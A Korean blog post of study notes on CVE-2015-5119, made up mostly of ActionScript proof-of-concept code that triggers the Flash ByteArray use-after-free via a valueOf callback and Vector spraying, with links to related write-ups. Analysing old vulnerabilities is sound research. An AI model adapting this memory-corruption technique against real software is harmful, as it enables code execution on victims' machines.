package {
import flash.system.*;
import flash.filters.*;
import __AS3__.vec.*;
import flash.utils.*;
public class Main extends Sprite {
static var ba:ByteArray;
public function Main():void{
var a:* = undefined;
var o:* = null;
var i:* = 0;
var j:* = 0;
a = new Array(98);
o = new Object();
while (i < 20){
a[i] = new ByteArray();
a[i].length = 210;
i += 1;
};
i = 20;
while (i < 98){
a[i] = new Object();
j = (i + 1);
while (j < (i + 5)) {
a[j] = new ByteArray();
a[j].length = 210;
j = (j + 1);
};
a[(i + 5)] = new Object();
i = (i + 6);
}
i = 98-26;
while (i > 20) {
ba = a[i];
try {
ba[1] = m;
} catch(e:Error) {};
return (ba[1]);
};
}
prototype.valueOf = function (){
return 2;
};
}
}
package {
import flash.system.*;
import flash.filters.*;
import __AS3__.vec.*;
import flash.utils.*;
public class MyCrash {
static var _gc:Array;
static var _va:Array;
static var _vLen:uint = 210;
static var _cf:ByteArray;
static var _isDbg:Boolean = Capabilities.isDebugger;
static function TryExpl():uint{
var j:* = 0;
var alen:* = 0;
var a:* = undefined;
var m:* = null;
var i:* = 0;
var v:* = null;
var m0:* = undefined;
try {
alen = (20 + 78);
a = new Array(alen);
if (_gc == null){
_gc = new Array();
};
_gc.push(a);
m = new (MyCrash);
while (i < 20) {
a[i] = new ByteArray();
a[i].length = _vLen;
i = (i + 1);
};
i = 20;
while (i < alen) {
a[i] = new MyClass2(i);
j = (i + 1);
while (j < (i + 5)) {
a[j] = new ByteArray();
a[j].length = _vLen;
j = (j + 1);
};
a[(i + 5)] = new MyClass2((i + 5));
i = (i + 6);
};
i = (alen - 26);
while (i > 20) {
_cf = a[i];
trace("before");
try {
_cf[1] = m;
} catch(e:Error) {
trace("assignment error");
};
trace("after");
return (_cf[1]);
};
} catch(e:Error) {
};
return (3);
}
prototype.valueOf = function (){
var i:int;
trace("valueOf");
_va = new Array(5);
_gc.push(_va);
_cf.length = 2000;
while (i < _va.length) {
_va[i] = new Vector.<uint>();
_va[i].length = _vLen;
i++;
};
_cf[1] = 99;
return (2);
};
}
}//package
package {
import flash.events.*;
import flash.text.*;
import flash.display.*;
public class Main extends Sprite {
public function Main():void{
var v:* = 0;
var clickHandler:* = null;
super();
trace("start");
clickHandler = function (event:MouseEvent):void{
};
v = MyCrash.TryExpl();
var tf:* = new TextField();
tf.x = 100;
tf.y = 0;
tf.width = 100;
tf.height = 100;
addChild(tf);
tf.type = TextFieldType.INPUT;
tf.text = new String(("cf[1] value:\n" + v));
graphics.clear();
graphics.beginFill(0xFF0000);
graphics.drawRect(0, 0, 100, 100);
graphics.endFill();
var content:* = new Sprite();
var btText:* = new TextField();
btText.text = "Push me to crash";
content.addChild(btText);
var bt:* = new SimpleButton();
addChild(bt);
bt.upState = content;
bt.overState = content;
bt.downState = content;
bt.hitTestState = content;
bt.addEventListener(MouseEvent.CLICK, clickHandler);
trace("finish");
}
}
}//package
package {
public class MyClass2 {
var i:int;
var length;
public function MyClass2(param1:int){
super();
this.i = param1;
}
}
}//package
https://wikileaks.org/hackingteam/emails/emailid/513536
https://labs.portcullis.co.uk/blog/cve-2015-5119-flash-bytearray-uaf-a-beginners-walkthrough/
'Project > Flash CVE 1-day Analysis' 카테고리의 다른 글
| CVE-2015-5119 분석 3일차 메모 (0) | 2017.02.21 |
|---|---|
| CVE-2015-5119 분석 2일차 (0) | 2017.02.14 |
| CVE-2015-0311 8일차 메모 (0) | 2017.01.25 |
| CVE-2015-0311 분석 7일차 (0) | 2017.01.23 |
| CVE-2015-0311 분석 6일차 (0) | 2017.01.21 |
